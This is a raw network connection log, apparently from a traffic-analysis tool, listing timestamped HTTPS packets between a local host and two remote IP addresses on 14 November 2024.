                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.759531021 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.759624958 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.759836912 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.759871960 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.779650927 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.780122042 CET49748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.780144930 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.780921936 CET49748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.780929089 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.851011992 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.851620913 CET49750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.851641893 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.852370024 CET49750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.852375984 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.920083046 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.920126915 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.920170069 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.920233011 CET49748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.922945023 CET49748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.922956944 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.922971964 CET49748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.922977924 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.926676035 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.927033901 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.927067041 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.927269936 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.927786112 CET49752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.927794933 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.928690910 CET49752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.928695917 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.929091930 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.929101944 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.987610102 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.987776995 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.988179922 CET49750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.991409063 CET49750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.991420031 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.991435051 CET49750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.991441965 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.998441935 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.998486996 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.998610020 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.999933958 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.999973059 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.055466890 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.055624962 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.055677891 CET49752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.057373047 CET49752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.057382107 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.057394028 CET49752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.057399035 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.076143026 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.076212883 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.076313972 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.078318119 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.078346968 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.153985023 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.154035091 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.154155970 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.154330015 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.154361963 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.506314039 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.517251015 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.517283916 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.518290997 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.518307924 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.799772978 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.799839020 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.799909115 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.799949884 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.799988031 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.800088882 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.800347090 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.800375938 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.800407887 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.800421953 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.802500010 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.804717064 CET49758443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.804769039 CET4434975813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.804869890 CET49758443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.805295944 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.805311918 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.806114912 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.806121111 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.806365967 CET49758443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.806396008 CET4434975813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.929339886 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.929893970 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.929940939 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.930644989 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.930653095 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.931250095 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.931354046 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.931638956 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.931660891 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.932221889 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.932229042 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.932929993 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.932992935 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.933747053 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:47.933769941 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.057709932 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.058516979 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.058640957 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.058862925 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.058876991 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.059664011 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.059747934 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.059798956 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.061007977 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.061029911 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.061048031 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.061054945 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.064093113 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.064246893 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.064315081 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.065327883 CET49759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.065362930 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.065447092 CET49759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.066771030 CET49760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.066809893 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.066873074 CET49760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.067051888 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.067076921 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.067094088 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.067101002 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.069610119 CET49761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.069669008 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.069775105 CET49761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.069940090 CET49759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.069957972 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.070230007 CET49760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.070245981 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.070538044 CET49761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.070564985 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.094474077 CET44349694142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.094613075 CET44349694142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.094671965 CET49694443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.104265928 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.104351044 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.104541063 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.104826927 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.104826927 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.104842901 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.104852915 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.108946085 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.108983994 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.109559059 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.109803915 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.109833002 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.557390928 CET4434975813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.557826042 CET49758443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.557869911 CET4434975813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.558253050 CET49758443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.558267117 CET4434975813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.689260006 CET4434975813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.689347982 CET4434975813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.689409018 CET49758443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.689457893 CET4434975813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.689496040 CET4434975813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.689543962 CET49758443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.689681053 CET49758443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.689707994 CET4434975813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.689732075 CET49758443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.689744949 CET4434975813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.692538023 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.692578077 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.692630053 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.692778111 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.692792892 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.801938057 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.802506924 CET49761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.802561998 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.802972078 CET49761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.802988052 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.803078890 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.803378105 CET49759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.803395033 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.803734064 CET49759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.803740025 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.809683084 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.809998989 CET49760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.810029030 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.810471058 CET49760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.810477972 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.853427887 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.853754997 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.853780031 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.854198933 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.854211092 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.931957960 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.932039022 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.932089090 CET49759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.932771921 CET49759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.932785034 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.932809114 CET49759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.932813883 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.938884974 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.939018011 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.939064026 CET49760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.941909075 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.942002058 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.942076921 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.942507982 CET49760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.942538023 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.942554951 CET49760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.942562103 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.945893049 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.945934057 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.949990034 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.950006008 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.950061083 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.950361967 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.950372934 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.982201099 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.982283115 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.982340097 CET49761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.983198881 CET49761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.983198881 CET49761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.983223915 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.983248949 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.988270044 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.988310099 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.988372087 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.989272118 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.989298105 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.997733116 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.997764111 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.997814894 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.997833014 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.997857094 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.997901917 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.998245001 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.998259068 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.998285055 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.998296022 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.002995014 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.003021955 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.003062010 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.003601074 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.003612041 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.440129042 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.440969944 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.440996885 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.441685915 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.441690922 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.570535898 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.571546078 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.572237015 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.572288036 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.572288036 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.572300911 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.572309017 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.578344107 CET49770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.578377008 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.578643084 CET49770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.582237959 CET49770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.582251072 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.655685902 CET49694443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.655745983 CET44349694142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.699408054 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.700562954 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.700618029 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.701405048 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.701442957 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.701451063 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.702060938 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.702078104 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.706147909 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.706155062 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.719485044 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.720189095 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.720232010 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.722141981 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.722148895 CET4434976713.107.246.45192.168.2.4
